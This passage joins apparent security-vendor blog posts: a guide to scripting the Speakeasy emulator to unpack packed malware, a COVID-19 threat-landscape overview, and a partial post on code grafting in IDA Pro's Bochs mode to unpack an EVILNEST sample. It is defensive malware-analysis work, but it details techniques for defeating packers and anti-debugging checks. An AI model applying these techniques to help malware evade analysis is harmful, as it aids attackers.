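memory = (b"\xcc" * 4 + "PATH".encode("latin-1") + b"\x00"
          + "PATH".encode("utf-16-le") + b"\x00\x00")
ansi = read_string(memory, 4, char_width_for("SetEnvironmentVariableA"))
wide = read_string(memory, 9, char_width_for("SetEnvironmentVariableW"))
```

Reading the wide string with a width of 1 would stop after the first character, which is why a handler needs the correct width before reading string arguments.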

It is good practice to overwrite string pointer values in the argv parameter with their corresponding string values (lines 14 and 15). This enables Speakeasy to display string values instead of pointer values in its API logs. To illustrate the impact of updating argv values, examine the Speakeasy output shown in Figure 7. In the VirtualAlloc entry, the symbolic constant string PAGE_EXECUTE_READWRITE replaces the value 0x40. In the GetModuleFileNameA and CreateFileA entries, pointer values are replaced with a file path.

KERNEL32.VirtualAlloc(0x0, 0x2b400, 0x3000, "PAGE_EXECUTE_READWRITE") -> 0x7c000
KERNEL32.GetModuleFileNameA(0x0, "C:\\Windows\\system32\\sample.exe", 0x104) -> 0x58
KERNEL32.CreateFileA("C:\\Windows\\system32\\sample.exe", "GENERIC_READ", 0x1, 0x0, "OPEN_EXISTING", 0x80, 0x0) -> 0x84

Figure 7: Speakeasy API logs
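To make the effect of overwriting argv concrete, here is a toy sketch that formats the same call before and after the pointers are replaced with strings. It is not Speakeasy's logging code; read_c_string, format_call, and the fake memory buffer are hypothetical names invented for illustration.

```python
def read_c_string(memory, address):
    """Read a NUL-terminated ASCII string from a fake memory buffer."""
    end = memory.index(b"\x00", address)
    return memory[address:end].decode("ascii")


def format_call(name, argv, ret):
    """Render a call for a log: strings are quoted, integers shown in hex."""
    rendered = [f'"{a}"' if isinstance(a, str) else hex(a) for a in argv]
    return f"{name}({', '.join(rendered)}) -> {hex(ret)}"


# Hypothetical emulator memory with two strings at 0x10 and 0x20.
memory = bytearray(0x40)
memory[0x10:0x14] = b"MODE"
memory[0x20:0x25] = b"debug"

argv = [0x10, 0x20]  # raw pointer arguments, as a handler would receive them
before = format_call("KERNEL32.SetEnvironmentVariableA", argv, 1)

# The good-practice step: swap pointers for the strings they reference.
argv[0] = read_c_string(memory, argv[0])
argv[1] = read_c_string(memory, argv[1])
after = format_call("KERNEL32.SetEnvironmentVariableA", argv, 1)

print(before)
print(after)
```

The first line shows only opaque addresses, while the second shows the variable name and value, which is far more useful when skimming a long API log.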

Saving the Unpacked Code Address

Packed samples often use functions such as VirtualAlloc to allocate memory used to store the unpacked sample. An effective approach for capturing the location and size of the unpacked code is to first hook the memory allocation function used by the unpacking stub. Figure 8 shows an example of hooking VirtualAlloc to capture the virtual address and amount of memory being allocated by the API call.

1: def virtualalloc_hook(self, emu, api_name, func, params):
2:     '''
3:     LPVOID VirtualAlloc(
4:        LPVOID lpAddress,
5:        SIZE_T dwSize,
6:        DWORD flAllocationType,
7:        DWORD flProtect
8:      );
9:     '''
10:    PAGE_EXECUTE_READWRITE = 0x40
11:    lpAddress, dwSize, flAllocationType, flProtect = params
12:    rv = func(params)
13:    if lpAddress == 0 and flProtect == PAGE_EXECUTE_READWRITE:
14:        self.logger.debug("[*] unpack stub VirtualAlloc call, saving dump info")
15:        self.dump_addr = rv
16:        self.dump_size = dwSize
17:    return rv

Figure 8: VirtualAlloc hook to save memory dump information

The hook in Figure 8 calls Speakeasy’s API handler for VirtualAlloc on line 12 to allow memory to be allocated. The virtual address returned by the API handler is saved to a variable named rv. Since VirtualAlloc may be used to allocate memory not related to the unpacking process, additional checks are used on line 13 to confirm the intercepted VirtualAlloc call is the one used in the unpacking code. Based on prior analysis, we’re looking for a VirtualAlloc call that receives the lpAddress value 0 and the flProtect value PAGE_EXECUTE_READWRITE (0x40). If these arguments are present, the virtual address and specified size are stored on lines 15 and 16 so they may be used to extract the unpacked payload from memory after the unpacking code is finished. Finally, on line 17, the return value from the VirtualAlloc handler is returned by the hook.
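The filtering logic can be exercised outside of an emulator. The sketch below is a standalone harness under stated assumptions: UnpackerSketch stands in for a Speakeasy subclass and make_fake_allocator is a hypothetical replacement for the real VirtualAlloc handler. Only the hook body mirrors Figure 8.

```python
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40


class UnpackerSketch:
    """Stand-in for a Speakeasy subclass; only the hook logic matters here."""

    def __init__(self):
        self.dump_addr = None
        self.dump_size = None

    def virtualalloc_hook(self, emu, api_name, func, params):
        lpAddress, dwSize, flAllocationType, flProtect = params
        rv = func(params)  # let the underlying handler perform the allocation
        if lpAddress == 0 and flProtect == PAGE_EXECUTE_READWRITE:
            # Looks like the unpacking stub's allocation: remember it.
            self.dump_addr = rv
            self.dump_size = dwSize
        return rv


def make_fake_allocator(base=0x7C000):
    """Hypothetical handler: hands out page-aligned addresses in order."""
    cursor = [base]

    def alloc(params):
        addr = cursor[0]
        cursor[0] += (params[1] + 0xFFF) & ~0xFFF  # round size up to a page
        return addr

    return alloc


unpacker = UnpackerSketch()
alloc = make_fake_allocator()

# An unrelated read/write allocation is passed through but not recorded.
first = unpacker.virtualalloc_hook(None, "kernel32.VirtualAlloc", alloc,
                                   [0, 0x1000, 0x3000, PAGE_READWRITE])
recorded_after_first = unpacker.dump_addr

# The RWX allocation with lpAddress == 0 is recorded.
second = unpacker.virtualalloc_hook(None, "kernel32.VirtualAlloc", alloc,
                                    [0, 0x2B400, 0x3000, PAGE_EXECUTE_READWRITE])
```

Note that the hook always returns the handler's value, so the sample sees the same result whether or not the call matched the filter.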

Surgical Code Emulation Using API and Code Hooks

Speakeasy is a robust emulation framework; however, you may encounter binaries that have large sections of problematic code. For example, a sample may call many unsupported APIs or simply take far too long to emulate. An example of overcoming both challenges is described in the following scenario.

Unpacking Stubs Hiding in MFC Projects

A popular technique used to disguise malicious payloads involves hiding them inside a large, open-source MFC project. MFC is short for Microsoft Foundation Class, which is a popular library used to build Windows desktop applications. These MFC projects are often arbitrarily chosen from popular Web sites such as Code Project. While the MFC library makes it easy to create desktop applications, MFC applications are difficult to reverse engineer due to their size and complexity. They are particularly difficult to emulate due to their large initialization routine that calls many different Windows APIs. What follows is a description of my experience with writing a Python script using Speakeasy to automate unpacking of a custom packer that hides its unpacking stub within an MFC project.

Reverse engineering the packer revealed the unpacking stub is ultimately called during initialization of the CWinApp object, which occurs after initialization of the C runtime and MFC. After attempting to bypass unsupported APIs, I realized that, even if successful, emulation would take far too long to be practical. I considered skipping over the initialization code completely and jumping straight to the unpacking stub. Unfortunately, execution of the C-runtime initialization code was required in order for emulation of the unpacking stub to succeed.

My solution was to identify a location in the code that fell after the C-runtime initialization but was early in the MFC initialization routine. After examining the Speakeasy API log shown in Figure 9, such a location was easy to spot. The graphics-related API function GetDeviceCaps is invoked early in the MFC initialization routine. This was deduced based on 1) MFC is a graphics-dependent framework and 2) GetDeviceCaps is unlikely to be called during C-runtime initialization.

0x43e0a7: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e0e3: 'kernel32.DecodePointer(0x7049)' -> 0x7048
0x43b16a: 'KERNEL32.HeapSize(0x4130, 0x0, 0x7000)' -> 0x90
0x43e013: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02a: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02c: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e068: 'kernel32.EncodePointer(0x44e215)' -> 0x44e216
0x43e013: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02a: 'KERNEL32.TlsGetValue(0x0)' -> 0xfeee0001
0x43e02c: 'kernel32.FlsGetValue(0x0)' -> 0x4150
0x43e068: 'kernel32.EncodePointer(0x704c)' -> 0x704d
0x43c260: 'KERNEL32.LeaveCriticalSection(0x466f28)' -> None
0x422151: 'USER32.GetSystemMetrics(0xb)' -> 0x1
0x422158: 'USER32.GetSystemMetrics(0xc)' -> 0x1
0x42215f: 'USER32.GetSystemMetrics(0x2)' -> 0x1
0x422169: 'USER32.GetSystemMetrics(0x3)' -> 0x1
0x422184: 'GDI32.GetDeviceCaps(0x288, 0x58)' -> None

Figure 9: Identifying beginning of MFC code in Speakeasy API logs

To intercept execution at this stage I created an API hook for GetDeviceCaps as shown in Figure 10. The hook confirms the function is being called for the first time on line 2.

1: def mfc_init_hook(self, emu, api_name, func, params):
2:     if not self.trigger_hit:
3:         self.trigger_hit = True
4:         self.h_code_hook = self.add_code_hook(self.start_unpack_func_hook)
5:         self.logger.debug("[*] MFC init api hit, starting unpack function")

Figure 10: API hook set for GetDeviceCaps

Line 4 shows the creation of a code hook using the add_code_hook function of the Speakeasy class. Code hooks allow you to specify a callback function that is called before each instruction that is emulated. Speakeasy also allows you to optionally specify an address range for which the code hook will be effective by specifying begin and end parameters.

After the code hook is added on line 4, the GetDeviceCaps hook completes and, prior to the execution of the sample's next instruction, the start_unpack_func_hook function is called. This function is shown in Figure 11.

1: def start_unpack_func_hook(self, emu, addr, size, ctx):
2:     self.h_code_hook.disable()
3:     unpack_func_va = self.module.get_rva_from_offset(self.unpack_offs) + self.module.get_base()
4:     self.set_pc(unpack_func_va)

Figure 11: Code hook that changes the instruction pointer

The code hook receives the emulator object, the address and size of the current instruction, and the context dictionary (line 1). On line 2, the code hook disables itself. Because code hooks are executed with each instruction, they slow emulation significantly. Therefore, they should be used sparingly and disabled as soon as possible. On line 3, the hook calculates the virtual address of the unpacking function. The offset used to perform this calculation was located using a regular expression. This part of the example was omitted for the sake of brevity.
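Since the regular expression itself was omitted, the following is only a guess at the general shape of such a search, not the pattern used for this packer. UNPACK_SIG is a hypothetical signature (a common 32-bit prologue that reserves a small stack frame), and find_unpack_offset is an illustrative name.

```python
import re

# Hypothetical signature: push ebp; mov ebp, esp; sub esp, imm32
# where the two high bytes of the immediate are zero (a small stack frame).
# re.DOTALL lets "." match any byte, including 0x0A.
UNPACK_SIG = re.compile(rb"\x55\x8B\xEC\x81\xEC..\x00\x00", re.DOTALL)


def find_unpack_offset(file_bytes):
    """Return the file offset of the first signature match, or None."""
    match = UNPACK_SIG.search(file_bytes)
    return match.start() if match else None


# Synthetic input: padding, then bytes that match the signature.
sample = b"\x90" * 0x400 + b"\x55\x8B\xEC\x81\xEC\x10\x02\x00\x00" + b"\xCC" * 4
offset = find_unpack_offset(sample)
```

A real signature would need to be specific enough to match only the unpacking function, which is why it has to be derived from the packer under analysis.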

The self.module attribute was previously set in the example code shown in Figure 2. Because it is subclassed from the PE class of pefile, we can access useful functions such as get_rva_from_offset() on line 3. This line also includes an example of using self.module.get_base() to retrieve the module's base virtual address.
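For readers unfamiliar with the arithmetic on line 3, the sketch below shows the general idea of turning a file offset into a virtual address using a section table. It is a simplified illustration with made-up section values, not pefile's implementation; Section and rva_from_offset are names chosen for this example.

```python
from collections import namedtuple

# Only the fields needed for the conversion; values below are made up.
Section = namedtuple("Section", "name virtual_address raw_offset raw_size")


def rva_from_offset(sections, offset):
    """Map a file offset to an RVA via the section that contains it."""
    for sec in sections:
        if sec.raw_offset <= offset < sec.raw_offset + sec.raw_size:
            return offset - sec.raw_offset + sec.virtual_address
    raise ValueError(f"offset {offset:#x} is not inside any section")


sections = [
    Section(".text", 0x1000, 0x400, 0x2000),
    Section(".data", 0x3000, 0x2400, 0x800),
]
image_base = 0x400000      # assumed load address of the module
unpack_offs = 0x1234       # file offset, e.g. found by a signature search

unpack_func_va = rva_from_offset(sections, unpack_offs) + image_base
```

The file offset is first rebased from the section's position on disk to its position in memory, and the module's base address is then added to produce the address passed to set_pc.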

Finally, on line 4, the instruction pointer is changed using the set_pc function and emulation continues at the unpacking code. The code snippets in Figure 10 and Figure 11 allowed us to redirect execution to the unpacking code after the C-runtime initialization completed and avoid MFC initialization code.

Dumping and Fixing Unpacked PEs

Once emulation has reached the original entry point of the unpacked sample, it is time to dump the PE and fix it up. Typically, a hook would save the base address of the unpacked PE in an attribute of the class as illustrated on line 15 of Figure 8. If the unpacked PE does not contain the correct entry point in its PE headers, the true entry point may also need to be captured during emulation. Figure 12 shows an example of how to dump emulator memory to a file.

with open(self.output_path, "wb") as up:
    mm = self.get_address_map(self.dump_addr)
    up.write(self.mem_read(mm.get_base(), mm.get_size()))

Figure 12: Dumping the unpacked PE

If you are dumping a PE that has already been loaded in memory, it will not have the same layout as it does on disk due to differences in section alignment. As a result, the dumped PE's headers may need to be modified. One approach is to modify each section's PointerToRawData value to match its VirtualAddress field. Each section's SizeOfRawData value may need to be padded in order to conform with the FileAlignment value specified in the PE’s optional headers. Keep in mind the resulting PE is unlikely to execute successfully. However, these efforts will allow most static analysis tools to function correctly.
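A minimal sketch of that header fix-up, using only the struct module and the field offsets from the PE format, might look like the following. It makes two assumptions: the dump begins with valid DOS and PE headers, and it is enough to round each existing SizeOfRawData up to FileAlignment. The function names are illustrative.

```python
import struct


def align_up(value, alignment):
    """Round value up to the next multiple of alignment."""
    return (value + alignment - 1) // alignment * alignment


def fix_section_headers(image):
    """Return a copy of a memory-dumped PE whose section headers point
    at the in-memory layout (PointerToRawData = VirtualAddress)."""
    data = bytearray(image)
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]        # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    opt_off = pe_off + 24                                    # optional header
    file_align = struct.unpack_from("<I", data, opt_off + 36)[0]
    if file_align == 0:
        raise ValueError("FileAlignment is zero")
    table = opt_off + opt_size                               # section table
    for i in range(num_sections):
        hdr = table + i * 40                                 # 40-byte entries
        virt_addr = struct.unpack_from("<I", data, hdr + 12)[0]
        raw_size = struct.unpack_from("<I", data, hdr + 16)[0]
        # SizeOfRawData at +16, PointerToRawData at +20
        struct.pack_into("<II", data, hdr + 16,
                         align_up(raw_size, file_align), virt_addr)
    return data
```

In practice you may prefer to perform the same edits through a PE parsing library; the raw offsets are shown here only to make each modified field explicit.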

The final step for repairing the dumped PE is to fix its import table. This is a complex task deserving of its own blog post and will not be discussed in detail here. However, the first step involves collecting a list of library function names and their addresses in emulator memory. If you know the GetProcAddress API is used by the unpacker stub to resolve imports for the unpacked PE, you can call the get_dyn_imports function as shown in Figure 13.

api_addresses = self.get_dyn_imports()

Figure 13: Retrieving dynamic imports

Otherwise, you can query the emulator class to retrieve its symbol information by calling the get_symbols function as shown in Figure 14.

symbols = self.get_symbols()

Figure 14: Retrieve symbol information from emulator class

This data can be used to discover the IAT of the unpacked PE and fix or reconstruct its import related tables.
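One simple way to use this data is to scan the dumped memory for pointer-sized values that match known API addresses; runs of consecutive hits are likely IAT entries. The sketch below assumes you have already converted the collected import or symbol data into a dictionary mapping address to name (the exact shape returned by Speakeasy is not covered here), and find_iat_candidates is a hypothetical helper.

```python
import struct


def find_iat_candidates(dump, dump_base, api_by_addr, ptr_size=4):
    """Return (virtual_address, api_name) for each aligned pointer in the
    dump whose value is a known API address."""
    fmt = "<I" if ptr_size == 4 else "<Q"
    hits = []
    for off in range(0, len(dump) - ptr_size + 1, ptr_size):
        value = struct.unpack_from(fmt, dump, off)[0]
        name = api_by_addr.get(value)
        if name is not None:
            hits.append((dump_base + off, name))
    return hits


# Made-up addresses standing in for emulator-assigned API locations.
api_by_addr = {
    0x77001000: "kernel32.VirtualAlloc",
    0x77002000: "kernel32.LoadLibraryA",
}
dump = bytearray(0x40)
struct.pack_into("<II", dump, 0x10, 0x77001000, 0x77002000)

candidates = find_iat_candidates(dump, 0x7C000, api_by_addr)
```

Rebuilding the import descriptors from these candidates is the harder part and remains out of scope for this post.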

Putting It All Together

Writing a Speakeasy script to unpack a malware sample can be broken down into the following steps:

Reverse engineer the unpacking stub to identify: 1) where the unpacked code will reside or where its memory is allocated, 2) where execution is transferred to the unpacked code, and 3) any problematic code that may introduce issues such as unsupported APIs, slow emulation, or anti-analysis checks.
If necessary, set hooks to bypass problematic code.
Set a hook to identify the virtual address and, optionally, the size of the unpacked binary.
Set a hook to stop emulation at, or after, execution of the original entry point of the unpacked code.
Collect virtual addresses of Windows APIs and reconstruct the PE’s import table.
Fix the PE’s headers (if applicable) and write the bytes to a file for further analysis.

For an example of a script that unpacks UPX samples, check out the UPX unpacking script in the Speakeasy repository.

Conclusion

The Speakeasy framework provides an easy-to-use, flexible, and powerful programming interface that enables analysts to solve complex problems such as unpacking malware. Using Speakeasy to automate these solutions allows them to be performed at scale. I hope you enjoyed this introduction to automating the Speakeasy framework and are inspired to begin using it to implement your own malware analysis solutions!

Limited Shifts in the Cyber Threat Landscape Driven by COVID-19

Threat Research

Sandra Joyce

8 April 2020 at 16:15

Though COVID-19 has had enormous effects on our society and economy, its effects on the cyber threat landscape remain limited. For the most part, the same actors we have always tracked are behaving in the same manner they did prior to the crisis. There are some new challenges, but they are perceptible, and we—and our customers—are prepared to continue this fight through this period of unprecedented change.

The significant shifts in the threat landscape we are currently tracking include:

The sudden major increase in a remote workforce has changed the nature and vulnerability of enterprise networks.
Threat actors are now leveraging COVID-19 and related topics in social engineering ploys.
We anticipate increased collection by cyber espionage actors seeking to gather intelligence on the crisis.
Healthcare operations, related manufacturing, logistics, and administration organizations, as well as government offices involved in responding to the crisis are increasingly critical and vulnerable to disruptive attacks such as ransomware.
Information operations actors have seized on the crisis to promote narratives primarily to domestic or near-abroad audiences.

Same Actors, New Content

The same threat actors and malware families that we observed prior to the crisis are largely pursuing the same objectives as before the crisis, using many of the same tools. They are simply now leveraging the crisis as a means of social engineering. This pattern of behavior is familiar. Threat actors have always capitalized on major events and crises to entice users. Many of the actors who are now using this approach have been tracked for years.

Ultimately, COVID-19 is being adopted broadly in social engineering approaches because it has widespread, generic appeal, and there is a genuine thirst for information on the subject that encourages users to take actions when they might otherwise have been circumspect. We have seen it used by several cyber criminal and cyber espionage actors, and in underground communities some actors have created tools to enable effective social engineering exploiting the coronavirus pandemic. Nonetheless, COVID-19 content is still only used in two percent of malicious emails.

For the time being, we do not believe this social engineering will be abating. In fact, it is likely to take many forms as changes in policy, economics, and other unforeseen consequences manifest. Recently we predicted a spike in stimulus related social engineering, for example. Additionally, the FBI has recently issued a press release anticipating a rise in COVID-19 related Business Email Compromise (BEC) scams.

State Actors Likely Very Busy

Given that COVID-19 is undoubtedly the overwhelming concern of governments worldwide for the time being, we anticipated targeting of government, healthcare, biotech, and other sectors by cyber espionage actors. We have not yet observed an incident of cyber espionage targeting COVID-19 related information; however, it is often difficult to determine what information these actors are targeting. There has been at least one case reported publicly which we have not independently confirmed.

We have seen state actors, such as those from Russia, China and North Korea, leverage COVID-19 related social engineering, but given wide interest in that subject, that does not necessarily indicate targeting of COVID-19 related information.

Threat to Healthcare

Though we have no reason to believe there is a sudden, elevated threat to healthcare, the criticality of these systems has probably never been greater, and thus the risk to this sector will be elevated throughout this crisis. The threat of disruption is especially disconcerting as it could affect the ability of these organizations to provide safe and timely care. This threat extends beyond hospitals to pharmaceutical companies, as well as manufacturing, administration and logistics organizations providing vital support. Additionally, many critical public health resources lie at the state and local level.

Though there is some anecdotal evidence suggesting some ransomware actors are avoiding healthcare targets, we do not expect that all actors will practice this restraint. Additionally, an attack on state and local governments, which have been a major target of ransomware actors, could have a disruptive effect on treatment and prevention efforts.

Remote Work

The sudden and unanticipated shift of many workers to work-from-home status will represent an opportunity for threat actors. Organizations will be challenged to move quickly to ensure sufficient capacity and to confirm that security controls and policies are in place. Disruptive situations can reduce morale and increase stress, leading to adverse behavior such as a reduced reluctance to open suspicious messages, and can even increase the risk of insider threats. Distractions while working at home can lower vigilance in scrutinizing and avoiding suspicious content as workers struggle to balance work and home responsibilities at the same time. Furthermore, the rapid adoption of platforms will undoubtedly lead to security mistakes and attract the attention of threat actors.

Secure remote access will likely rely on use of VPNs and user access permissions and authentication procedures intended to limit exposure of proprietary data. Hardware and infrastructure protection should include ensuring full disk encryption on enterprise devices, maintaining visibility on devices through an endpoint security tool, and maintaining regular software updates.

For more on this issue, see our blog post on the risks associated with remote connectivity.

The Information Operations Threat

We have seen information operations actors promote narratives associated with COVID-19 to manipulate primarily domestic or near-abroad audiences. We observed accounts in Chinese-language networks operating in support of the People's Republic of China (PRC), some of which we previously identified to be promoting messaging pertaining to the Hong Kong protests, shift their focus to praising the PRC's response to the COVID-19 outbreak, criticizing the response of Hong Kong medical workers and the U.S. to the pandemic, and covertly promoting a conspiracy theory that the U.S. was responsible for the outbreak of the coronavirus in Wuhan.

We have also identified multiple information operations promoting COVID-19-related narratives that were aimed at Russian- and Ukrainian-speaking audiences, including some that we assess with high confidence are part of the broader suspected Russian influence campaign publicly referred to as "Secondary Infektion," as well as other suspected Russian activity. These operations have included leveraging a false hacktivist persona to spread the conspiracy theory that the U.S. developed the coronavirus in a weapons laboratory in Central Asia, taking advantage of physical protests in Ukraine to push the narrative that Ukrainians repatriated from Wuhan will infect the broader Ukrainian population, and claiming that the Ukrainian healthcare system is ill-equipped to deal with the pandemic. Other operations alleged that U.S. government or military personnel were responsible for outbreaks of the coronavirus in various countries including Lithuania and Ukraine, or insisted that U.S. personnel would contribute to the pandemic's spread if scheduled multilateral military exercises in the region were to continue as planned.

Outlook

It is clear that adversaries expect us to be distracted by these overwhelming events. The greatest cyber security challenge posed by COVID-19 may be our ability to stay focused on the threats that matter most. An honest assessment of the cyber security implications of the pandemic will be necessary to make efficient use of resources limited by the crisis itself.

For more information and resources that can help strengthen defenses, visit FireEye's "Managing Through Change and Crisis" site, which aggregates many resources to help organizations that are trying to navigate COVID-19 related security challenges.

Thinking Outside the Bochs: Code Grafting to Unpack Malware in Emulation

Threat Research

Michael Bailey

7 April 2020 at 16:00

This blog post continues the FLARE script series with a discussion of patching IDA Pro database files (IDBs) to interactively emulate code. While the fastest way to analyze or unpack malware is often to run it, malware won’t always successfully execute in a VM. I use IDA Pro’s Bochs integration in IDB mode to sidestep tedious debugging scenarios and get quick results. Bochs emulates the opcodes directly from your IDB in a Bochs VM with no OS.

Bochs IDB mode eliminates distractions like switching VMs, debugger setup, neutralizing anti-analysis measures, and navigating the program counter to the logic of interest. Alas, where there is no OS, there can be no loader or dynamic imports. Execution is constrained to opcodes found in the IDB. This precludes emulating routines that call imported string functions or memory allocators. Tom Bennett’s flare-emu ships with emulated versions of these, but for off-the-cuff analysis (especially when I don’t know if there will be a payoff), I prefer interactively examining registers and memory to adjust my tactics ad hoc.

What if I could bring my own imported functions to Bochs like flare-emu does? I’ve devised such a technique, and I call it code grafting. In this post I’ll discuss the particulars of statically linking stand-ins for common functions into an IDB to get more mileage out of Bochs. I’ll demonstrate using this on an EVILNEST sample to unpack and dump next-stage payloads from emulated memory. I’ll also show how I copied a tricky call sequence from one IDB to another IDB so I could keep the unpacking process all in a single Bochs debug session.

EVILNEST Scenario

My sample (MD5 hash 37F7F1F691D42DCAD6AE740E6D9CAB63, which is available on VirusTotal) was an EVILNEST variant that populates the stack with configuration data before calling an intermediate payload. Figure 1 shows this unusual call site.

Figure 1: Call site for intermediate payload

The code in Figure 1 executes in a remote thread within a hollowed-out iexplore.exe process; the malware uses anti-analysis tactics as well. I had the intermediate payload stage and wanted to unpack next-stage payloads without managing a multi-process debugging scenario with anti-analysis. I knew I could stub out a few function calls in the malware to run all of the relevant logic in Bochs. Here’s how I did it.

Code Carving

I needed opcodes for a few common functions to inject into my IDBs and emulate in Bochs. I built simple C implementations of selected functions and compiled them into one binary. Figure 2 shows some of these stand-ins.

Figure 2: Simple implementations of common functions

I compiled this and then used IDAPython code similar to Figure 3 to extract the function opcode bytes.

Figure 3: Function extraction

I curated a library of function opcodes in an IDAPython script as shown in Figure 4. The nonstandard function opcodes at the bottom of the figure were hand-assembled as tersely as possible to generically return specific values and manipulate the stack (or not) in conformance with calling conventions.

Figure 4: Extracted function opcodes

On top of simple functions like memcpy, I implemented a memory allocator. The allocator referenced global state data, meaning I couldn’t just inject it into an IDB and expect it to work. I read the disassembly to find references to global operands and templatized them for use with Python’s format method. Figure 5 shows an example for malloc.

Figure 5: HeapAlloc template code
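Because the figure is an image, here is a small stand-in that shows the templating idea. The opcodes are a hand-written 32-bit bump allocator of my own, not the allocator from the Code Grafting script, and MALLOC_TEMPLATE, le32_hex, and render_stub are hypothetical names.

```python
import struct

# Hand-written cdecl bump allocator (32-bit x86), for illustration only.
# {next_ptr} marks each reference to the global "next free byte" cursor.
MALLOC_TEMPLATE = (
    "A1{next_ptr}"      # mov eax, [next_ptr]   ; return the current cursor
    "8B4C2404"          # mov ecx, [esp+4]      ; requested size
    "01C1"              # add ecx, eax          ; cursor + size
    "890D{next_ptr}"    # mov [next_ptr], ecx   ; store the new cursor
    "C3"                # ret
)


def le32_hex(value):
    """Hex text of a 32-bit value in little-endian byte order."""
    return struct.pack("<I", value).hex()


def render_stub(template, **addresses):
    """Fill address placeholders and return the opcode bytes."""
    filled = template.format(**{k: le32_hex(v) for k, v in addresses.items()})
    return bytes.fromhex(filled)


# The cursor's address is only known once the data segment is placed.
stub = render_stub(MALLOC_TEMPLATE, next_ptr=0x00500000)
```

Keeping the opcodes as text with named placeholders means the same stub can be re-rendered for whatever address the data ends up at in each IDB.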

I organized the stubs by name as shown in Figure 6 both to call out functions I would need to patch, and to conveniently add more function stubs as I encounter use cases for them. The mangled name I specified as an alias for free is operator delete.

Figure 6: Function stubs and associated names

To inject these functions into the binary, I wrote code to find the next available segment of a given size. I avoided occupying low memory because Bochs places its loader segment below 0x10000. Adjacent to the code in my code segment, I included space for the data used by my memory allocator. Figure 7 shows the result of patching these functions and data into the IDB and naming each location (stub functions are prefixed with stub_).

Figure 7: Data and code injected into IDB
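The search for a free address range can be sketched independently of IDA. In the example below, the segment list is passed in as plain (start, end) tuples rather than read from the IDB, and the function name, alignment, and ceiling are assumptions for illustration; only the 0x10000 floor comes from the discussion above.

```python
def align_up(value, alignment):
    """Round value up to the next multiple of alignment."""
    return (value + alignment - 1) // alignment * alignment


def find_free_range(segments, size, floor=0x10000,
                    ceiling=0x100000000, alignment=0x1000):
    """Return the lowest aligned address at or above floor where size
    bytes fit without overlapping any (start, end) segment, else None."""
    cursor = align_up(floor, alignment)
    for start, end in sorted(segments):
        if start >= cursor + size:
            return cursor                    # the gap before this segment fits
        cursor = max(cursor, align_up(end, alignment))
    return cursor if cursor + size <= ceiling else None


# Two existing segments leave only a 0x1000-byte gap, which is too small.
segments = [(0x10000, 0x20000), (0x21000, 0x30000)]
new_base = find_free_range(segments, 0x2000)
```

Segment ends are treated as exclusive here, so a new segment may start exactly where an existing one finishes.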

The script then iterates all the relevant calls in the binary and patches them with calls to their stub implementations in the newly added segment. As shown in Figure 8, IDAPython’s Assemble function saved the effort of calculating the offset for the call operand manually. Note that the Assemble function worked well here, but for bigger tasks, Hex-Rays recommends a dedicated assembler such as Keystone Engine and its Keypatch plugin for IDA Pro.

Figure 8: Abbreviated routine for assembling a call instruction and patching a call site to an import

The Code Grafting script updated all the relevant call sites to resemble Figure 9, with the target functions being replaced by calls to the stub_ implementations injected earlier. This prevented Bochs in IDB mode from getting derailed when hitting these call sites, because the call operands now pointed to valid code inside the IDB.

Figure 9: Patched operator new() call site
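For anyone curious about the arithmetic the assembler handles, a near call on x86 is the byte E8 followed by a 32-bit displacement measured from the end of the instruction. The sketch below computes it by hand; it assumes the original instruction is at least five bytes long (an indirect call through an import is typically six) and pads any remainder with NOPs. The function names are illustrative.

```python
import struct


def assemble_call(site, target):
    """Encode 'call target' for an instruction located at address site."""
    rel = (target - (site + 5)) & 0xFFFFFFFF   # relative to the next instruction
    return b"\xE8" + struct.pack("<I", rel)


def patch_call_site(site, target, original_length):
    """Return replacement bytes of the same length as the original call."""
    if original_length < 5:
        raise ValueError("not enough room for a 5-byte near call")
    return assemble_call(site, target) + b"\x90" * (original_length - 5)


# Redirect a 6-byte import call at 0x401000 to a stub at 0x500000.
patched = patch_call_site(0x401000, 0x500000, 6)
```

Masking the displacement to 32 bits makes backward calls work as well, since a negative offset is stored in two's complement form.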

Dealing with EVILNEST

The debug scenario for the dropper was slightly inconvenient, and simultaneously, it was setting up a very unusual call site for the payload entry point. I used Bochs to execute the dropper until it placed the configuration data on the stack, and then I used IDAPython’s idc.get_bytes function to extract the resulting stack data. I wrote IDAPython script code to iterate the stack data and assemble push instructions into the payload IDB leading up to a call instruction pointing to the DLL’s export. This allowed me to debug the unpacking process from Bochs within a single session.
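The push synthesis is simple enough to sketch without IDA. The example below assumes the captured stack data starts at the stack pointer and is a whole number of 32-bit values. It emits raw push imm32 opcodes rather than assembling text, and encode_pushes is a hypothetical name.

```python
import struct


def encode_pushes(stack_bytes):
    """Return 'push imm32' opcodes that rebuild the given stack contents.

    stack_bytes[0:4] is the value at the top of the stack, so it must be
    pushed last; the values are therefore emitted in reverse order.
    """
    if len(stack_bytes) % 4:
        raise ValueError("stack data must be a multiple of 4 bytes")
    dwords = struct.unpack(f"<{len(stack_bytes) // 4}I", stack_bytes)
    return b"".join(b"\x68" + struct.pack("<I", d) for d in reversed(dwords))


# Stack snapshot: 0x11111111 on top, 0x22222222 beneath it.
snapshot = struct.pack("<2I", 0x11111111, 0x22222222)
pushes = encode_pushes(snapshot)
```

A call instruction to the payload's entry point would then follow these bytes in the synthesized call site.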

I clicked on the beginning of my synthesized call site and hit F4 to run it in Bochs. I was greeted with the warning in Figure 10 indicating that the patched IDB would not match the depictions made by the debugger (which is untrue in the case of Bochs IDB mode). Bochs faithfully executed my injected opcodes producing exactly the desired result.

Figure 10: Patch warning

I watched carefully as the instruction pointer approached and passed the IsDebuggerPresent check. Because of the stub I injected (stub_IsDebuggerPresent), it passed the check returning zero as shown in Figure 11.

Figure 11: Passing up IsDebuggerPresent

I allowed the program counter to advance to address 0x1A1538, just beyond the unpacking routine. Figure 12 shows the register state at this point which reflects a value in EAX that was handed out by my fake heap allocator and which I was about to visit.

Figure 12: Running to the end of the unpacker and preparing to view the result

